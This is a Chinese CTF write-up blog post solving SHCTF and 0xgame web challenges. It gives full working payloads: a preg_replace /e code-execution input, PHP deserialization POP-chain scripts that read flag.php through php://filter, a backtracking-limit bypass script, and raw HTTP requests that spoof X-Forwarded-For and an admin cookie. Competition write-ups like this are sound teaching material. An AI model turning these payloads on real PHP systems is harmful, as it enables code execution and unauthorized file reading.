SHCTF&0xgame

Posted on

SHCTF

[WEEK1]飞机大战

查看js,发现分数要大于99999,所以转到控制器

image-20231006131627245

修改分数点击回车后,点击开始游戏就会弹出flag

image-20231006131558566

image-20231006131759294

法二:直接在js中发现won函数,里面的unicode编码解码后就是flag

image-20231006131912160

[WEEK1]ezphp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
 <?php
error_reporting(0);
if(isset($_GET['code']) && isset($_POST['pattern']))
{
    $pattern=$_POST['pattern'];
    if(!preg_match("/flag|system|pass|cat|chr|ls|[0-9]|tac|nl|od|ini_set|eval|exec|dir|\.|\`|read*|show|file|\<|popen|pcntl|var_dump|print|var_export|echo|implode|print_r|getcwd|head|more|less|tail|vi|sort|uniq|sh|include|require|scandir|\/| |\?|mv|cp|next|show_source|highlight_file|glob|\~|\^|\||\&|\*|\%/i",$code))
    {
        $code=$_GET['code'];
        preg_replace('/(' . $pattern . ')/ei','print_r("\\1")', $code);
        echo "you are smart";
    }else{
        die("try again");
    }
}else{
    die("it is begin");
}
?>
it is begin

重点代码为:

1
preg_replace('/(' . $pattern . ')/ei','print_r("\\1")', $code);

payload:

1
2
POST /?code=${phpinfo()} HTTP/1.1
pattern=\S*

自己理解:正则匹配模式设置为:匹配输入字符串中的连续非空白字符序列,所以匹配到了${phpinfo()},\\1捕获了该字符串,又由于是/e模式:表示替换字符串中的匹配部分将被视为 PHP 代码,并执行它,所以print_r("${phpinfo()}")被执行
在环境中找到flag
image-20231006144747769

[WEEK1]ez_serialize

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
class A{
  public $var_1='php://filter/read=convert.base64-encode/resource=flag.php'; 
}
class B{
  public $q;
}
class C{
  public $var;
  public $z;

}
class D{
  public $p;

}
$a = new A();
$b = new B();
$c = new C();
$d = new D();
$d->p = $a;
$c->z = $d;
$b->q = $c;
echo serialize($b);
?>

[WEEK1]1zzphp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
 <?php 
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
    $code = (String)$_POST['c_ode'];
    $num=$_GET['num'];
    if(preg_match("/[0-9]/", $num))
    {
        die("no number!");
    }
    elseif(intval($num))
    {
      if(preg_match('/.+?SHCTF/is', $code))
      {
        die('no touch!');
      }
      if(stripos($code,'2023SHCTF') === FALSE)
      {
        die('what do you want');
      }
      echo $flag;
    }
}

绕过if(preg_match("/[0-9]/", $num)):因为preg_match第二个参数必须是string类型,当我们传入数组num[]=1时,preg_match函数会报错,返回false。而后面intval函数的第一个参数是mixed:接受多种不同的数据类型,所以返回的是1,进入内层if。

if(preg_match('/.+?SHCTF/is', $code))绕过:字符串数量超过1000000时,preg_match函数会挂掉,后面再接上payload就不会被匹配到,上脚本:

1
2
3
4
5
6
7
8
9
10
11
12
code = "very"*250000+"2023SHCTF"

payload = "/?num[]=1"

url = "http://112.6.51.212:30458"
data={

  'c[ode':code          #这边[到php当中会被当做_

}
r = requests.post(url=url+payload,data=data)
print(r.text)

image-20231006153514460

[WEEK2]serialize

image-20231011114101333

我们需要知道最后要的include在milaoshu类里,我们开始反推,$this->gao=$this->fei;把milaoshu赋给$this->fei触发__tostring(),然后musca中的return $this->ding->dong; 把misca赋给$this->ding触发_get,到达__wakeup(),执行unserialize()时,先会调用这个函数,即到达入口。

整个逻辑是传入序列化后的payload,反序列化的时候触发__wakeup(),然后到get再到tostring(),非常清晰。
数组绕过check,但是发现

image-20231011114947899

这是因为get中调用了miaomiao,把Mikey Mouse~赋值给了成员属性$a,而后面的die括号中是$a,即终止程序并输出括号里的值作为报错信息,不管别的,这里没有输出include+伪协议的内容,那么我们就想到把报错信息改成伪协议读取。$this->gao=$this->fei;触发的tostring,就添加

1
2
3
public function __construct(){
    $this->a=&$this->gao;
}

payload:

1
wanna[fl.ag=a:1:{i:0;O:5:"musca":2:{s:4:"ding";O:5:"misca":3:{s:3:"gao";N;s:3:"fei";O:8:"milaoshu":1:{s:1:"v";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}s:1:"a";R:4;}s:4:"dong";N;}}

注意参数中的_要改成[

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php

class misca{
    public $gao;
    public $fei;
    public $a;
    public function __construct(){
        $this->a=&$this->gao;
    }
}
class musca{
    public $ding;
    public $dong;

}
class milaoshu{
    public $v='php://filter/read=convert.base64-encode/resource=flag.php';

}
$a = new misca();
$b = new musca();
$c = new milaoshu();
$a->fei = $c;
$b->ding = $a;
echo serialize(array($b));

[WEEK1]生成你的邀请函吧~

1
2
3
4
5
6
API:url/generate_invitation  
Request:POST application/json  
Body:{  
    "name": "Yourname",  
    "imgurl": "http://q.qlogo.cn/headimg_dl?dst_uin=QQnumb&spec=640&img_type=jpg"  
}

根据题目要求直接改包

image-20231102114828021

这样看是有数据的

image-20231102114924326

放包,下载下来一个图片

image-20231102115001804****

image-20231102115032865

0xgame

###[Week 1] signin

image-20231001110256175

[Week 1] baby_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /?a=QNKCDZO&b=s878926199a HTTP/1.1
Host: 120.27.148.152:50014
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://120.27.148.152:50014
Connection: close
Cookie: name=php://filter/read=convert.base64-encode/resource=flag
Referer: http://120.27.148.152:50014/?a=QNKCDZO&b=s878926199a
Upgrade-Insecure-Requests: 1

c=1024.1a

image-20231001105621221

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /?query=ctf HTTP/1.1
Host: 120.27.148.152:50012
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1
Cookie: role=admin
Upgrade-Insecure-Requests: 1
Content-Length: 14
Content-Type: application/x-www-form-urlencoded

action=getflag